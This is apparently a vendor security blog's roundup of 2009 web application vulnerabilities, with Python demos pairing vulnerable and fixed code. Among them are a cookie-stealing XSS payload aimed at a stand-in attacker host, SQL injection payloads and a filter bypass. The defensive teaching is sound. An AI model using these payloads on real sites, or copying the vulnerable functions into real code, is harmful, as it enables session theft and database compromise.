HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and carry out a host of other malicious aims. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms, unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Top Five Web Application Vulnerabilities 6/08/09 - 6/23/09

1) F5 Networks FirePass SSL VPN Unspecified Cross-Site Scripting Vulnerability


F5 Networks FirePass SSL VPN is susceptible to a Cross-Site Scripting vulnerability; the affected component has not been disclosed. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, forge requests that are mistaken for those of a valid user, compromise confidential information, or run attacker-controlled script in the victim's browser. On an SSL VPN portal that session is the user's gateway to internal resources, which makes a stolen session cookie especially valuable. An update which resolves this issue has been released. Contact the vendor for more details.


http://www.securityfocus.com/bid/35312


2) ModSecurity SQL Injection Rule Security Bypass Vulnerability


ModSecurity is susceptible to a SQL Injection rule bypass vulnerability: crafted input that its SQL Injection rules fail to match passes through to the protected application. An attacker can leverage this to evade the filter and carry out SQL Injection and related web-application attacks against applications that depend on ModSecurity for protection. A fix has not yet been released. Contact the vendor for additional information. A web application firewall is a compensating control, not a substitute for correct code; applications behind ModSecurity should still use parameterized queries so that a rule bypass does not become a database compromise.


http://www.securityfocus.com/bid/35323


3) Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability


Apache Tomcat is susceptible to an information disclosure vulnerability in its 'RequestDispatcher' handling. Successful exploitation would give an attacker access to sensitive information that could be used to mount more damaging attacks. Updates which resolve this issue have been released. Contact the vendor for further information.


http://www.securityfocus.com/bid/35263


4) FireStats 'firestats-wordpress.php' Remote File Include Vulnerability


FireStats is susceptible to a remote file include vulnerability in 'firestats-wordpress.php' due to improper validation of user-supplied input. A remote file include flaw lets an attacker make the application load and execute a script from a server under the attacker's control, so successful exploitation could lead to a complete compromise of the application and underlying system. The latest version (1.6.2) resolves this issue. Contact the vendor for more information.


http://www.securityfocus.com/bid/35367


5) Kerio MailServer WebMail Cross Site Scripting Vulnerability


Kerio MailServer WebMail is susceptible to a Cross-Site Scripting vulnerability. Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not properly validated or encoded, allowing an attacker to embed malicious script in the generated page; the script then runs in the browser of any user who views that page, with that user's session and privileges. Updates which resolve this issue have been released. Contact the vendor for further details.


http://www.securityfocus.com/bid/35264


Top Five Web Application Vulnerabilities 5/26/09 - 6/07/09

1) Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability


Sun Java System Web Server is susceptible to a Cross-Site Scripting vulnerability in its Reverse Proxy Plug-in. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, forge requests that are mistaken for those of a valid user, compromise confidential information, or run attacker-controlled script in the victim's browser. Updates which resolve this vulnerability have been released. Contact the vendor for further details.


http://www.securityfocus.com/bid/35204
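As an added illustration of the mechanism described in the Kerio entry above (and the XSS entries for F5 and Sun), the following Python sketch is not code from any of those products and is not tied to their specific flaws. A constructed login-failure page reflects the submitted username: the vulnerable renderer pastes it into the HTML as-is, the fixed renderers encode it for the context it lands in, and a separate helper covers the URL case that encoding alone does not fix. The payload string and the host attacker.example are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Added example for this roundup; it is not code from Kerio, F5 or Sun. A constructed
# login-failure page reflects the submitted username, the case the Kerio entry
# describes. The vulnerable version pastes the value into the HTML verbatim; the
# fixed versions encode it for the context it lands in.

# Constructed payload: ships the victim's cookies to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def render_vulnerable(username: str) -> str:
    """Reflects user input straight into element content: the browser parses it as HTML."""
    return f"<p>Login failed for user {username}</p>"


def render_safe(username: str) -> str:
    """html.escape(quote=True) encodes & < > " ' so the value cannot open a tag."""
    return f"<p>Login failed for user {html.escape(username, quote=True)}</p>"


def render_attr_safe(username: str) -> str:
    """Attribute context: the same encoder keeps the value inside its double quotes,
    so a payload such as  " onfocus="alert(1)  cannot add an event handler."""
    return f'<input name="username" value="{html.escape(username, quote=True)}">'


def safe_href(url: str) -> str:
    """URL context needs more than encoding: a javascript: URL is well-formed HTML
    after escaping but still runs script when clicked. Allow only absolute http(s)
    URLs here; relative links would need their own rule."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def injected_script(page: str) -> bool:
    """Crude check used in the demo: does a raw <script tag survive rendering?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("encoded:   ", render_safe(PAYLOAD))
    print("attribute: ", render_attr_safe('" onfocus="alert(1)'))
    print("href:      ", safe_href("javascript:alert(1)"))
```

The point of the three fixed helpers is that the encoder depends on where the value is inserted (element content, quoted attribute, URL); a single "sanitize on input" pass cannot know that, which is why the description above says validated or encoded rather than validated alone.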


2) PHP-Nuke 'main/tracking/userLog.php' SQL Injection Vulnerability


PHP-Nuke is susceptible to a SQL Injection vulnerability in 'main/tracking/userLog.php'. Successful exploitation could give an attacker the means to read or modify back-end database contents or, in some circumstances, to take control of the server hosting the database. A solution has not yet been released. Contact the vendor for additional information.


http://www.securityfocus.com/bid/35117


3) phpBugTracker Multiple SQL Injection Vulnerabilities


phpBugTracker is susceptible to multiple SQL Injection vulnerabilities. SQL Injection can give an attacker full access to a back-end database and, in certain circumstances, can be used to take complete control of the system. Solutions have not yet been released. Contact the vendor for more information.


http://www.securityfocus.com/bid/35101
http://www.securityfocus.com/bid/35125
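The following Python example is added here to make the two SQL Injection entries above and the ModSecurity rule-bypass entry in the newer roundup concrete. It is not code from PHP-Nuke, phpBugTracker or ModSecurity; the blocklist in it is a stand-in for a signature rule, not the ModSecurity rule set or the specific bypass in BID 35323. It uses an in-memory SQLite table with constructed rows: a concatenated query falls to a classic payload, a naive filter catches that spelling but misses a rewritten one, and a parameterized query is unaffected by either.

```python
import re
import sqlite3

# Added example for this roundup; it is not code from ModSecurity, PHP-Nuke or
# phpBugTracker. An in-memory SQLite table with constructed rows stands in for
# the back-end database the entries above describe.


def make_db() -> sqlite3.Connection:
    """Create a throwaway users table with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", 1), ("bob", "hunter2", 0)],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Concatenates user input into the statement, so input can become SQL syntax.
    Returns the matched username or None."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same lookup with bound parameters: the driver passes input as data, never as syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# A deliberately naive blocklist standing in for a signature-based SQL Injection
# rule. It is NOT the ModSecurity rule set and says nothing about the specific
# bypass in BID 35323; it only shows why pattern matching on input is brittle:
# each pattern assumes one particular spelling of the attack.
NAIVE_SQLI_RULES = [
    re.compile(r"'\s*or\s+'", re.IGNORECASE),  # the classic ' OR '1'='1
    re.compile(r"--"),                          # SQL line comment used to truncate a query
]


def naive_filter_blocks(value: str) -> bool:
    """True if any rule matches, i.e. the request would be dropped at the filter."""
    return any(rule.search(value) for rule in NAIVE_SQLI_RULES)


def attempt(conn: sqlite3.Connection, login, username: str, password: str):
    """Filter first, then the chosen login routine, as a WAF in front of an app would."""
    if naive_filter_blocks(username) or naive_filter_blocks(password):
        return "blocked by filter"
    return login(conn, username, password)


if __name__ == "__main__":
    db = make_db()
    # Comments out the password check; the filter catches this spelling.
    classic = "alice' --"
    # Same effect via an unterminated C-style comment, which SQLite ends at end of
    # input; neither rule matches it, so it reaches the vulnerable query intact.
    rewritten = "alice'/*"
    for user in (classic, rewritten):
        print(repr(user), "->", attempt(db, login_vulnerable, user, "wrong"),
              "| parameterized:", attempt(db, login_safe, user, "wrong"))
```

Run stand-alone it prints that the classic payload is blocked while the rewritten one logs in as alice through the concatenated query, and that neither payload does anything against the parameterized query. That last line is the practical lesson of a rule bypass: the filter buys time, the parameterized query removes the bug.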


4) Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness


Apache Tomcat's form authentication is susceptible to a username-enumeration weakness: a login attempt for an existing username produces a different result from one for a non-existent username, so an attacker can submit candidate names and learn which accounts exist before guessing any passwords. Updates which resolve this issue are available. Contact the vendor for additional details.


http://www.securityfocus.com/bid/35196
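As an added example of the weakness class (not Tomcat's code, and not a description of the precise Tomcat behaviour in BID 35196), the following Python shows a login routine that answers differently for unknown and known usernames next to one that gives a single failure message and does the same password-hashing work in both cases. The user store, iteration count and passwords are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Added example for this roundup; it is not Tomcat's code and does not describe the
# specific Tomcat behaviour in BID 35196. It shows the general weakness: a login
# that answers "unknown user" and "wrong password" differently lets an attacker
# confirm account names without knowing any password.

ITERATIONS = 50_000  # constructed for the demo; choose per deployment


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def new_record(password: str):
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


# Constructed user store with one real account.
USERS = {"alice": new_record("correct horse")}
# Decoy record used for unknown names so the hashing work is the same either way;
# its password is random and is never accepted.
DUMMY = new_record(os.urandom(32).hex())


def login_leaky(username: str, password: str) -> str:
    """Distinct messages (and no hashing for unknown names) reveal which names exist."""
    record = USERS.get(username)
    if record is None:
        return "Unknown username"
    salt, stored = record
    if not hmac.compare_digest(stored, hash_password(password, salt)):
        return "Incorrect password"
    return "Login successful"


def login_uniform(username: str, password: str) -> str:
    """One message and the same amount of work whether or not the name exists."""
    salt, stored = USERS.get(username, DUMMY)
    matched = hmac.compare_digest(stored, hash_password(password, salt))
    # The decoy must never log anyone in, even if a guess equalled its random password.
    if username not in USERS:
        matched = False
    return "Login successful" if matched else "Invalid username or password"


def distinct_failures(login, candidates, password: str = "not-the-password"):
    """What an attacker sees: the set of responses across candidate usernames.
    More than one distinct failure response means the login is an enumeration oracle."""
    return {login(name, password) for name in candidates}


if __name__ == "__main__":
    names = ["alice", "admin", "root", "nobody"]
    print("leaky:  ", distinct_failures(login_leaky, names))
    print("uniform:", distinct_failures(login_uniform, names))
```

The message is only half of the fix: the leaky version also returns immediately for unknown names, so response time leaks the same bit even if the text is unified. Hashing against a decoy record removes that difference. Password-reset and registration forms need the same treatment, since they are the usual places an enumeration check is forgotten.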


5) IBM FileNet Content Manager Cached Subject Security Bypass Vulnerability


IBM FileNet Content Manager is susceptible to a security bypass vulnerability involving cached subjects that may allow access to sensitive information. Fixes which address this issue have been released. Contact the vendor for further information.


http://www.securityfocus.com/bid/35228
